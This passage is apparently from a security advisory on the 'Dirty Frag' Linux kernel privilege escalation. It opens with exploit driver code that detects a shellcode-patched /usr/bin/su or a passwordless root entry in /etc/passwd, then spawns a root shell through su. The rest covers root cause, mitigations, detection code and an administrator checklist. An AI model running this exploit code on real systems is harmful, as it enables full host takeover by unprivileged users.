 * The 8 bytes our su payload places at file offset 0x78 — the first
 * instructions of the embedded shell ELF.  Sequence:
 *   31 ff   xor edi, edi
 *   31 f6   xor esi, esi
 *   31 c0   xor eax, eax
 *   b0 6a   mov al, 0x6a   (setgid)
 * Distros' original /usr/bin/su has different bytes here, so this is
 * a reliable post-patch marker.
 *
 * (We don't check offset 0 because /usr/bin/su already has the ELF
 * magic there — both before and after we patch.)
 */
static const uint8_t su_marker[8] = {
	0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,
};

static int su_already_patched(void)
{
	int fd = open("/usr/bin/su", O_RDONLY);
	if (fd < 0)
		return 0;
	uint8_t got[8];
	ssize_t n = pread(fd, got, sizeof(got), 0x78);
	close(fd);
	if (n != sizeof(got))
		return 0;
	return memcmp(got, su_marker, sizeof(su_marker)) == 0;
}

static int passwd_already_patched(void)
{
	int fd = open("/etc/passwd", O_RDONLY);
	if (fd < 0)
		return 0;
	char head[16];
	ssize_t n = pread(fd, head, sizeof(head), 0);
	close(fd);
	if (n < 9)
		return 0;
	return memcmp(head, "root::0:0", 9) == 0;
}

static int either_target_patched(void)
{
	return su_already_patched() || passwd_already_patched();
}

static void silence_stderr(int *saved_fd)
{
	*saved_fd = dup(STDERR_FILENO);
	int dn = open("/dev/null", O_WRONLY);
	if (dn >= 0) {
		dup2(dn, STDERR_FILENO);
		close(dn);
	}
}

static void restore_stderr(int saved_fd)
{
	if (saved_fd >= 0) {
		dup2(saved_fd, STDERR_FILENO);
		close(saved_fd);
	}
}

static char **append_corrupt_only(int argc, char **argv, int *new_argc)
{
	static char *flag = "--corrupt-only";
	static char *buf[64];
	int n = argc < 60 ? argc : 60;
	for (int i = 0; i < n; i++)
		buf[i] = argv[i];
	buf[n] = flag;
	buf[n + 1] = NULL;
	*new_argc = n + 1;
	return buf;
}

static void exec_su_login(void)
{
	const char *paths[] = {
		"/bin/su", "/usr/bin/su", "/sbin/su", "/usr/sbin/su", NULL,
	};
	for (int i = 0; paths[i]; i++)
		execl(paths[i], "su", "-", (char *)NULL);
	execlp("su", "su", "-", (char *)NULL);
}

/*
 * Spawn `/usr/bin/su -` in a fresh PTY and bridge our tty to it.
 */
static int run_root_pty(void)
{
	int master = posix_openpt(O_RDWR | O_NOCTTY);
	if (master < 0)
		return -1;
	if (grantpt(master) < 0 || unlockpt(master) < 0) {
		close(master);
		return -1;
	}
	char *slave_name = ptsname(master);
	if (!slave_name) {
		close(master);
		return -1;
	}

	struct winsize ws;
	if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0)
		ioctl(master, TIOCSWINSZ, &ws);

	pid_t pid = fork();
	if (pid < 0) {
		close(master);
		return -1;
	}
	if (pid == 0) {
		setsid();
		int slave = open(slave_name, O_RDWR);
		if (slave < 0)
			_exit(127);
		ioctl(slave, TIOCSCTTY, 0);
		dup2(slave, 0);
		dup2(slave, 1);
		dup2(slave, 2);
		if (slave > 2)
			close(slave);
		close(master);
		exec_su_login();
		_exit(127);
	}

	signal(SIGTTOU, SIG_IGN);
	signal(SIGTTIN, SIG_IGN);
	signal(SIGPIPE, SIG_IGN);
	signal(SIGHUP,  SIG_IGN);
	(void)setpgid(0, 0);
	(void)tcsetpgrp(STDIN_FILENO, getpid());

	struct termios saved_termios;
	int restore_termios = 0;
	if (tcgetattr(STDIN_FILENO, &saved_termios) == 0) {
		struct termios raw = saved_termios;
		cfmakeraw(&raw);
		if (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0)
			restore_termios = 1;
	}

	int auto_pw_sent = 0;
	int stdin_eof = 0;
	int saw_master_output = 0;
	int total_ms = 0;
	char buf[4096];

	for (;;) {
		struct pollfd pfds[2] = {
			{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },
			{ master,                        POLLIN, 0 },
		};
		int pr = poll(pfds, 2, 200);
		if (pr < 0 && errno != EINTR)
			break;
		total_ms += 200;

		if (pfds[1].revents & POLLIN) {
			ssize_t n = read(master, buf, sizeof(buf));
			if (n <= 0)
				break;
			saw_master_output = 1;
			(void)write(STDOUT_FILENO, buf, n);
			if (!auto_pw_sent && n < (ssize_t)sizeof(buf)) {
				buf[n] = 0;
				if (strstr(buf, "Password") ||
						strstr(buf, "password")) {
					(void)write(master, "\n", 1);
					auto_pw_sent = 1;
				}
			}
		}
		if (!stdin_eof && (pfds[0].revents & POLLIN)) {
			ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
			if (n <= 0)
				stdin_eof = 1;
			else
				(void)write(master, buf, n);
		}
		if (pfds[1].revents & (POLLHUP | POLLERR))
			break;

		if (!auto_pw_sent && !saw_master_output && total_ms >= 1500) {
			(void)write(master, "\n", 1);
			auto_pw_sent = 1;
		}

		int status;
		pid_t w = waitpid(pid, &status, WNOHANG);
		if (w == pid) {
			for (int i = 0; i < 5; i++) {
				struct pollfd pf = { master, POLLIN, 0 };
				if (poll(&pf, 1, 50) <= 0)
					break;
				ssize_t n = read(master, buf, sizeof(buf));
				if (n <= 0)
					break;
				(void)write(STDOUT_FILENO, buf, n);
			}
			break;
		}
	}

	if (restore_termios)
		tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);
	close(master);
	return 0;
}

int main(int argc, char **argv)
{
	int verbose = (getenv("DIRTYFRAG_VERBOSE") != NULL);
	int force_esp = 0, force_rxrpc = 0;
	int saved_err = -1;
	int rc = 1;
	int new_argc;
	char **co_argv;

	for (int i = 1; i < argc; i++) {
		if (!strcmp(argv[i], "--force-esp"))
			force_esp = 1;
		else if (!strcmp(argv[i], "--force-rxrpc"))
			force_rxrpc = 1;
		else if (!strcmp(argv[i], "-v") ||
				!strcmp(argv[i], "--verbose"))
			verbose = 1;
	}

	if (getuid() == 0) {
		execlp("/bin/bash", "bash", (char *)NULL);
		_exit(1);
	}

	co_argv = append_corrupt_only(argc, argv, &new_argc);

	if (!verbose)
		silence_stderr(&saved_err);

	if (force_rxrpc) {
		rc = rxrpc_lpe_main(new_argc, co_argv);
		for (int i = 0; !passwd_already_patched() && i < 3; i++)
			rc = rxrpc_lpe_main(new_argc, co_argv);
	} else if (force_esp) {
		rc = su_lpe_main(new_argc, co_argv);
	} else {
		rc = su_lpe_main(new_argc, co_argv);
		if (!su_already_patched()) {
			rc = rxrpc_lpe_main(new_argc, co_argv);
			for (int i = 0; !passwd_already_patched() && i < 3; i++)
				rc = rxrpc_lpe_main(new_argc, co_argv);
		}
	}

	int patched = either_target_patched();

	if (!verbose)
		restore_stderr(saved_err);

	if (patched) {
		(void)run_root_pty();
		return 0;
	}

	dprintf(2, "dirtyfrag: failed (rc=%d)\n", rc);
	return rc ? rc : 1;
}

Impact

The main impact is local privilege escalation to root. Any attacker who already has code execution as an unprivileged local user may be able to become root. This includes:

- compromised SSH accounts;
- malicious users on shared servers;
- compromised web applications with local shell access;
- container escape chains where the attacker can reach a vulnerable host kernel path;
- post-exploitation scenarios after an initial RCE.

Dirty Frag is not a remote network vulnerability by itself. The attacker needs local code execution. However, once local code execution exists, the vulnerability can turn a low-privileged foothold into full host compromise.

Another important impact is forensic ambiguity. Like Dirty Pipe and Copy Fail, the modification is page-cache based. The disk file may remain unchanged, while reads and executions observe the corrupted in-memory version. File integrity monitoring that relies on on-disk contents or file metadata may miss the corruption, and once the affected pages are evicted or the host reboots, the evidence may be gone. Public coverage of the related Copy Fail flaw made the same point: page-cache corruption may leave no obvious disk trace.
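
One way to make the disk-versus-cache distinction concrete is to read the same file twice, once through the page cache and once with O_DIRECT, and compare the results. The following is a minimal sketch, not a vetted detection tool: the function name cached_differs_from_disk and the 4096-byte block size are assumptions for illustration, some filesystems reject O_DIRECT, and a short buffered read in the middle of a file would be misreported.

```c
#define _GNU_SOURCE             /* needed for O_DIRECT */
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CMP_BLOCK 4096          /* assumed alignment; adjust for the device */

/* Hypothetical helper: returns 1 if the cached view of `path` differs
 * from what an O_DIRECT read returns, 0 if both views match, and -1 on
 * any error (including filesystems that do not support O_DIRECT). */
int cached_differs_from_disk(const char *path)
{
	int result = -1;
	off_t off = 0;
	void *cached = NULL, *direct = NULL;
	int cfd = open(path, O_RDONLY);
	int dfd = open(path, O_RDONLY | O_DIRECT);

	if (cfd < 0 || dfd < 0)
		goto out;
	/* O_DIRECT requires aligned buffers, so allocate both the same way. */
	if (posix_memalign(&cached, CMP_BLOCK, CMP_BLOCK) != 0 ||
	    posix_memalign(&direct, CMP_BLOCK, CMP_BLOCK) != 0)
		goto out;

	for (;;) {
		ssize_t nc = pread(cfd, cached, CMP_BLOCK, off);
		ssize_t nd = pread(dfd, direct, CMP_BLOCK, off);

		if (nc < 0 || nd < 0)
			goto out;
		if (nc != nd || memcmp(cached, direct, (size_t)nc) != 0) {
			result = 1;     /* the two views disagree */
			goto out;
		}
		if (nc < CMP_BLOCK) {   /* short read: treated as end of file */
			result = 0;
			goto out;
		}
		off += nc;              /* stays block-aligned */
	}
out:
	free(cached);
	free(direct);
	if (cfd >= 0)
		close(cfd);
	if (dfd >= 0)
		close(dfd);
	return result;
}
```

A caller might run this against /etc/passwd and /usr/bin/su and treat a return value of 1 as a reason to investigate further. A return value of 0 is not proof of a clean system, since corrupted pages may already have been evicted.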

Why This Happened

Dirty Frag is a classic example of a cross-subsystem kernel bug. No single component looks obviously unsafe in isolation:

- splice() is designed for efficient zero-copy movement of data.
- skb fragments are designed to avoid unnecessary packet copies.
- In-place crypto is a performance optimization.
- The page cache is designed to avoid repeated disk reads.
- XFRM and RxRPC assume their input buffers are safe to modify under certain conditions.

The vulnerability appears when these assumptions meet. A file-backed page that should be read-only to the attacker travels through zero-copy paths into a network packet fragment. Later, crypto code treats that fragment as a private mutable buffer. The missing boundary check is: “Is this fragment backed by externally shared or file-cache memory that must not be modified in place?”

The ESP patch addresses this by marking shared fragments with SKBFL_SHARED_FRAG and forcing ESP input to avoid the fast skip_cow path when such fragments are present. In other words, the kernel must copy before writing.

For RxRPC, the submitted patch described by the researcher adds skb->data_len checks so non-linear skbs are copied before in-place decrypt operations.
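
The "copy before writing" rule behind both fixes can be illustrated with a small userspace model. This is a toy sketch only, not kernel code: struct toy_frag, toy_make_writable, and toy_transform_in_place are hypothetical names, the shared field merely plays the role that SKBFL_SHARED_FRAG plays in the kernel, and a one-byte XOR stands in for decryption.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Toy stand-in for a packet fragment: a pointer to memory plus a flag
 * recording whether that memory also belongs to someone else. */
struct toy_frag {
	uint8_t *data;
	size_t   len;
	int      shared;  /* 1 if another owner (e.g. a file cache) sees data */
	int      owned;   /* 1 if data was allocated here and must be freed */
};

/* Replace a shared buffer with a private copy before any write. */
int toy_make_writable(struct toy_frag *f)
{
	uint8_t *copy;

	if (!f->shared)
		return 0;               /* already private, nothing to do */
	copy = malloc(f->len ? f->len : 1);
	if (!copy)
		return -1;
	memcpy(copy, f->data, f->len);
	f->data = copy;
	f->shared = 0;
	f->owned = 1;
	return 0;
}

/* Stand-in for an in-place transform such as decryption. */
int toy_transform_in_place(struct toy_frag *f, uint8_t key)
{
	size_t i;

	if (toy_make_writable(f) != 0)
		return -1;
	for (i = 0; i < f->len; i++)
		f->data[i] ^= key;      /* writes only ever hit private memory */
	return 0;
}
```

In this model, a fragment created with shared set to 1 leaves its original backing buffer untouched after toy_transform_in_place returns. Removing the toy_make_writable call reproduces the bug pattern in miniature: the transform would then write straight into the shared buffer.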

Mitigation and Defense

1. Apply vendor kernel updates immediately

The permanent fix is a kernel update from your Linux distribution. Because Dirty Frag was disclosed after an embargo break, public write-ups appeared before all distributions had shipped fixes. Administrators should track vendor advisories for Ubuntu, Red Hat, SUSE, Fedora, AlmaLinux, CentOS Stream, Debian, Amazon Linux, and any custom kernel providers.

2. Disable vulnerable modules where possible

The Dirty Frag repository suggests temporarily preventing the loading of esp4, esp6, and rxrpc, unloading them if already loaded, and dropping page cache afterward. This is a mitigation, not a substitute for patching. It may break IPsec, RxRPC, AFS-related functionality, or workloads that depend on these kernel modules.

Defensive hardening ideas:

- blacklist or block esp4 / esp6 if IPsec ESP is not required
- blacklist or block rxrpc if RxRPC/AFS is not required
- remove loaded modules only after validating production impact
- reboot or drop caches after suspected exploitation or testing
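
Before blocking anything, it helps to know whether the modules are loaded at all. A minimal sketch, assuming the usual /proc/modules layout in which the module name is the first space-terminated field of each line; module_listed is a hypothetical helper name. Code compiled directly into the kernel does not appear in /proc/modules, so a negative result here does not prove the code path is absent.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: returns 1 if `name` is the first field of some
 * line in `path` (normally /proc/modules), 0 if it is not listed, and
 * -1 if the file cannot be opened. */
int module_listed(const char *path, const char *name)
{
	char line[512];
	size_t nlen = strlen(name);
	int at_line_start = 1;
	int found = 0;
	FILE *fp = fopen(path, "r");

	if (!fp)
		return -1;
	while (fgets(line, sizeof(line), fp)) {
		/* Only match at a real line start, and require the space
		 * so that "esp4" does not match "esp4_offload". */
		if (at_line_start && strncmp(line, name, nlen) == 0 &&
		    line[nlen] == ' ') {
			found = 1;
			break;
		}
		/* A chunk without '\n' means the line continues. */
		at_line_start = (strchr(line, '\n') != NULL);
	}
	fclose(fp);
	return found;
}
```

A small wrapper could call module_listed("/proc/modules", "esp4") and repeat the call for "esp6" and "rxrpc", then report which of the three are currently loaded.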

3. Restrict unprivileged user namespaces

The ESP variant needs a way to obtain CAP_NET_ADMIN in a new namespace. Restricting unprivileged user namespaces can reduce exposure to that path. However, this is not a complete fix because the RxRPC variant was specifically designed to work without unshare() in environments where rxrpc.ko is available.
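
Whether unprivileged user namespaces are available is usually visible through a few sysctl files. The sketch below reads them and prints what it finds. The helper names read_long_file and report_userns_settings are hypothetical, and the list of knobs is an assumption about common setups: user.max_user_namespaces is the upstream control, while kernel.unprivileged_userns_clone and kernel.apparmor_restrict_unprivileged_userns exist only on some distribution kernels.

```c
#include <stdio.h>

/* Hypothetical helper: parse a single integer from a sysctl-style file.
 * Returns 0 on success, -1 if the file is missing or unparsable. */
int read_long_file(const char *path, long *out)
{
	FILE *fp = fopen(path, "r");
	int ok;

	if (!fp)
		return -1;
	ok = (fscanf(fp, "%ld", out) == 1);
	fclose(fp);
	return ok ? 0 : -1;
}

/* Print the user-namespace related knobs that exist on this host. */
void report_userns_settings(FILE *to)
{
	static const char *const knobs[] = {
		"/proc/sys/user/max_user_namespaces",
		"/proc/sys/kernel/unprivileged_userns_clone",
		"/proc/sys/kernel/apparmor_restrict_unprivileged_userns",
	};
	size_t i;

	for (i = 0; i < sizeof(knobs) / sizeof(knobs[0]); i++) {
		long v;

		if (read_long_file(knobs[i], &v) == 0)
			fprintf(to, "%s = %ld\n", knobs[i], v);
		else
			fprintf(to, "%s: not present\n", knobs[i]);
	}
}
```

Calling report_userns_settings(stdout) prints one line per knob. A value of 0 for user.max_user_namespaces means namespace creation is disabled. Interpreting the distribution-specific knobs should follow the vendor's documentation.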

4. Reduce local attack surface

Because Dirty Frag is a local privilege escalation, defense should focus on limiting who can execute code locally:

- remove unnecessary shell access
- isolate hosting users
- harden CI/CD runners
- restrict writable web roots
- separate application users
- use container profiles with seccomp/AppArmor/SELinux
- avoid privileged containers

5. Monitor suspicious kernel feature use

Detection is difficult because successful exploitation modifies memory, not necessarily disk. Still, defenders can look for suspicious combinations:

- unexpected use of splice/vmsplice by untrusted processes
- unprivileged attempts to create AF_RXRPC sockets
- unusual add_key("rxrpc", ...) activity
- unexpected AF_ALG crypto socket usage
- sudden loading of rxrpc, esp4, or esp6 modules
- unprivileged namespace creation followed by XFRM netlink operations
- execution anomalies involving /usr/bin/su

eBPF, auditd, SELinux audit logs, AppArmor logs, and EDR telemetry may help, but none should be treated as a replacement for patching.

6. Clear page cache or reboot after suspected exploitation

The Dirty Frag repository warns that running the exploit contaminates page cache and recommends dropping caches or rebooting afterward. In a real incident, a reboot may be cleaner, but administrators should preserve forensic evidence first if compromise is suspected.
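
Dropping caches is normally done by writing to /proc/sys/vm/drop_caches as root. A minimal sketch of that step follows. The function name drop_caches and its path parameter are assumptions made so the routine can be exercised against an ordinary file. Pages that are still in active use may not be dropped, which is one reason a reboot is the more thorough option.

```c
#include <stdio.h>
#include <unistd.h>

/* Hypothetical helper: flush dirty data, then ask the kernel to drop
 * clean page cache, dentries, and inodes by writing "3" to the knob.
 * Returns 0 on success, -1 on failure (for example when not root). */
int drop_caches(const char *knob_path)
{
	FILE *fp;
	int ok;

	sync();                         /* write back dirty pages first */
	fp = fopen(knob_path, "w");
	if (!fp)
		return -1;
	ok = (fputs("3\n", fp) >= 0);
	if (fclose(fp) != 0)            /* the write may only fail at close */
		ok = 0;
	return ok ? 0 : -1;
}
```

On a real host the call would be drop_caches("/proc/sys/vm/drop_caches"), run with root privileges and only after any forensic capture is complete.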

Practical Administrator Checklist

[ ] Identify kernel versions across all Linux hosts.
[ ] Check whether esp4, esp6, or rxrpc modules are present or loaded.
[ ] Check whether unprivileged user namespaces are enabled.
[ ] Review vendor advisories and install patched kernels.
[ ] Reboot into the fixed kernel after update.
[ ] Temporarily block vulnerable modules if business-safe.
[ ] Monitor for suspicious use of splice, AF_RXRPC, AF_ALG, and XFRM.
[ ] Treat shared multi-user systems as high priority.
[ ] Treat internet-facing systems with any local code execution path as high priority.
[ ] Reassess container hosts, CI runners, build machines, and hosting panels.

Conclusion

Dirty Frag is important because it shows that page-cache corruption is not a one-off Linux kernel mistake. Dirty Pipe, Copy Fail, and now Dirty Frag all point to the same dangerous pattern: performance optimizations that move pages across subsystems without making ownership and mutability explicit enough.

The technical lesson is simple but painful: if a kernel subsystem performs in-place writes, it must be absolutely certain that the destination memory is private and writable. In Dirty Frag, that guarantee was broken across networking, zero-copy I/O, and crypto paths. The result is a reliable local privilege escalation class affecting major Linux distributions.

For defenders, the priority is straightforward: patch kernels, reboot into fixed versions, temporarily disable exposed modules where possible, restrict local execution paths, and do not rely solely on disk integrity checks to detect page-cache attacks.

core-jmp